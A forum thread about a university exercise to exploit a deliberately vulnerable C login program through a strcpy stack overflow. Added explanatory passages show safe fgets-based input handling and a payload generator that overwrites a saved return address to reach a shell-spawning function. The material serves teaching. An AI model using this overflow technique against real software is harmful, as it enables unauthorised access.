
C Exploit


ghost wrote:

Hi,

My lecturer has given us a simple program he has written in C and wants us to write an exploit for it. I am not asking someone to do it, more for some guidance. If you're interested and could maybe help, that would be great :)


ynori7 (Future Emperor of Earth) wrote:

what kind of program are you trying to exploit?


ghost wrote:

it is a simple "enter name, enter password" program; if you get the password correct you are given a shell. He is looking for us to write a buffer overflow for it…


ynori7 (Future Emperor of Earth) wrote:

i actually have a piece of code that demonstrates a simple buffer overflow:

```c
/* buffer_overrun.c
 * A simple little c program to demonstrate why gets() is bad
 *
 * if you enter a butt-load of stuff for foo, it will overwrite the info for bar
 * **************************/

#include <stdio.h>
#include <stdlib.h>

int main(void) {
	char* foo = (char*)malloc(sizeof(char));    /* a 1-byte block */
	char* bar = (char*)malloc(5*sizeof(char));  /* a 5-byte block, normally placed right after foo's */
	*foo = 'x';
	bar[0] = 'b';
	bar[1] = 'a';
	bar[2] = 'r';
	bar[3] = '\0';

	printf("foo is '%c'\n",*foo);
	printf("bar is '%s'\n",bar);
	printf("Enter new value for foo: ");
	gets(foo);   /* no length limit: a long line runs past foo's block into bar's */
	printf("foo is '%c'\n",*foo);
	printf("bar is '%s'\n",bar);
	return 0;
}
```

so when it prompts you to enter a new value for 'foo', just type a whole line full of random letters, and you should see that that information overwrites the data stored in the variable 'bar'. this is why gets() has been replaced with scanf() and the man page for gets() specifically says not to use it.

i don't know if that's any help to you, but i tried.
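The post above claims that input typed into 'foo' ends up in 'bar'. The following is an added example, not code from the thread: it puts two fixed-size fields side by side in a struct (so the neighbour really is adjacent, rather than relying on where malloc happens to place blocks), shows an unbounded copy, which is exactly what gets()/strcpy() do, clobbering the neighbour, and shows the two fixes a practitioner would actually use: a bounded copy that reports truncation, and an fgets()-based line reader that drains an over-long line so the next read does not get the leftover half. The struct, the function names and the test strings are mine.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Two adjacent fixed-size fields standing in for foo and bar from the
 * post above. A struct guarantees bar sits right after foo; the heap
 * version only usually does. (Constructed example, not from the thread.) */
struct pair {
    char foo[8];
    char bar[8];
};

/* Unbounded copy, exactly what gets()/strcpy() do: copy until the NUL,
 * never looking at the destination size. Bytes beyond foo land in bar.
 * Returns 1 if bar was clobbered, 0 if it survived. The copy goes through
 * a byte view of the whole struct and the input must be shorter than
 * sizeof(struct pair), so the demonstration itself stays well defined. */
int copy_unbounded(struct pair *p, const char *input) {
    strcpy(p->bar, "bar");
    char *d = (char *)p + offsetof(struct pair, foo);
    while ((*d++ = *input++) != '\0') { }
    return strcmp(p->bar, "bar") != 0;
}

/* Bounded copy, the fix: never writes outside foo. Returns 0 if the
 * input fit, -1 if it had to be truncated. bar is untouched either way. */
int copy_bounded(struct pair *p, const char *input) {
    strcpy(p->bar, "bar");
    size_t n = strlen(input);
    if (n >= sizeof p->foo) {
        memcpy(p->foo, input, sizeof p->foo - 1);
        p->foo[sizeof p->foo - 1] = '\0';
        return -1;
    }
    memcpy(p->foo, input, n + 1);
    return 0;
}

/* What to use instead of gets(): fgets() with the buffer size, newline
 * stripped. Returns the line length; -1 if the line was longer than
 * cap-1 (the excess is discarded so the next call starts on the next
 * line instead of silently splitting one line across two reads);
 * -2 on EOF or error. */
long read_line(char *dst, size_t cap, FILE *in) {
    if (fgets(dst, (int)cap, in) == NULL) return -2;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return (long)(n - 1);
    }
    if (n < cap - 1) return (long)n;          /* EOF before newline: whole line */
    int c, truncated = 0;                      /* buffer full, no newline seen */
    while ((c = fgetc(in)) != EOF && c != '\n') truncated = 1;
    return truncated ? -1 : (long)n;
}

int main(void) {
    struct pair p;
    printf("unbounded, 12 bytes into foo[8]: bar clobbered = %d\n",
           copy_unbounded(&p, "AAAAAAAAAAAA"));
    printf("bounded,   12 bytes into foo[8]: rc = %d, bar = '%s'\n",
           copy_bounded(&p, "AAAAAAAAAAAA"), p.bar);
    char line[8];
    long rc = read_line(line, sizeof line, stdin);
    printf("read_line: rc = %ld, got '%s'\n", rc, line);
    return 0;
}
```

Feed the program a line longer than seven characters and read_line reports -1 with the first seven characters kept and the rest thrown away; that truncation signal is the part a gets() replacement must not lose, because a caller that cannot tell a full buffer from a complete line will happily treat the leftover as the next input.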

ghost wrote:

thanks a lot for that, it definitely helps me :)

just in case anyone is interested, the code we have to exploit is below

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int checkPass(char *Pbuffer)
{
  if (!strcmp(Pbuffer,"password"))
    {
    return (1);
    }
  else
    {
    printf("Incorrect password\n");
    return (0);
    }
}

/* the goal of the exercise: get here without knowing the password */
void secretArea (void)
{
  puts("Congratulation you have access!");
  system("xterm");
}

int checkName(int argc, char **argv)
{
  char Ubuffer [30];
  int flag=1;

  if (argc>1)
    strcpy(Ubuffer,argv[1]);   /* unbounded copy of argv[1] into a 30-byte stack buffer */

  while (flag==1)
    {
    if (!strcmp(Ubuffer,"Nick"))
      {
      printf("Hello Nick");
      return(1);
      }
    printf("Wrong Name\n");
    return(0);
    }
  return(0);   /* only reached if flag is not 1; added so every path returns a value */
}

int main (int argc, char **argv)
{
  char Pbuffer [30];
  if (!checkName(argc,argv))
    {return(0); }
  printf("\nPlease enter password: ");
  gets(Pbuffer);   /* unbounded read into a 30-byte stack buffer */
  if (checkPass(Pbuffer))
   {
   secretArea();
   }
  return 0;
}
```

ynori7 (Future Emperor of Earth) wrote:

you should edit your post to disable smileys. it'll be easier to read that way.

how exactly does your teacher want you to exploit this? since you know the username and password, you can easily get into the secret area without writing any code.


ghost wrote:

you probably know this by looking at the code, but the password is 'password' and once entered you are given a terminal.

He wants us to write a bit of code that gives you access to the terminal and gets past the login without using 'password' as the password.


ghost wrote:

As a big help, the vulnerable line is:

```c
strcpy(Ubuffer,argv[1]);
```

try running the program and see what happens if you feed a lot of A's as the username, you'll get a runtime error. Also, if you are compiling this code under windows you need to include stdlib.h for the system function, otherwise you get a compile error.

If you want any help, feel free to message me at xero-tech@hotmail.com via msn. Just know I won't give you the answer, but I'll gladly help you there.
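The hint above names the strcpy into Ubuffer and suggests flooding it with A's. What the thread does not show is the exploit the student eventually wrote, so the following is an added example of my own, not code from the thread: a generator for the argv[1] payload that the classic approach uses, padding up to checkName's saved return address and then overwriting it with the address of secretArea, so that whichever return checkName takes after "Wrong Name", execution lands in secretArea and the password prompt is never reached. The offset and the address are placeholders that have to be read from a debugger on the actual binary; they are not values the thread supplies. The NUL check is the edge case a practitioner wants: argv entries are C strings and strcpy stops at the first zero byte, so an address with a 0x00 byte cannot be delivered this way.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Placeholders, NOT values from the thread: the distance from the start
 * of Ubuffer to checkName()'s saved return address, and the address of
 * secretArea(). Both depend on compiler, flags and alignment; take them
 * from a debugger on the real binary (break in checkName and see where
 * the A's end up relative to the saved return address; "p secretArea"
 * in gdb for the target). 0x080484a6 is chosen only so no byte is 0x00. */
#define ASSUMED_OFFSET  46u
#define ASSUMED_TARGET  0x080484a6u

/* Build 'A' * offset followed by target as a 32-bit little-endian value
 * (the layout for a 32-bit x86 build). Returns the payload length, or 0
 * if out[] is too small to hold it plus the terminating NUL. */
size_t build_payload(unsigned char *out, size_t cap,
                     size_t offset, uint32_t target) {
    if (offset + 4 >= cap) return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (unsigned char)(target >> (8 * i));
    out[offset + 4] = '\0';
    return offset + 4;
}

/* strcpy(Ubuffer, argv[1]) stops at the first NUL, and argv entries are
 * handed over as C strings anyway, so a NUL anywhere inside the payload
 * truncates it. Returns 1 if the payload can reach Ubuffer intact. */
int argv_safe(const unsigned char *payload, size_t len) {
    return memchr(payload, 0, len) == NULL;
}

int main(void) {
    unsigned char buf[128];
    size_t n = build_payload(buf, sizeof buf, ASSUMED_OFFSET, ASSUMED_TARGET);
    if (n == 0 || !argv_safe(buf, n)) {
        fprintf(stderr, "payload unusable (too long or contains a NUL byte)\n");
        return 1;
    }
    fwrite(buf, 1, n, stdout);   /* usage: ./vuln "$(./gen)" */
    return 0;
}
```

Two caveats for anyone reproducing the lab: the return-address overwrite is only reachable if the target was built without a stack canary and as a non-PIE 32-bit binary (roughly gcc -m32 -fno-stack-protector -no-pie); with a canary the process aborts with "stack smashing detected" before the ret executes, and on a 64-bit build the high bytes of the address are zero, which the argv_safe check above would reject for the same NUL reason.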


ghost wrote:

exploit is now all written :) great help from DigitalOutcast thank you!


Uber0n (Member) wrote:

DigitalOutcast wrote: Also if you are compiling this code under windows you need to include stdlib.h for the system function otherwise you get a compile error.

No need for that ^^ ;)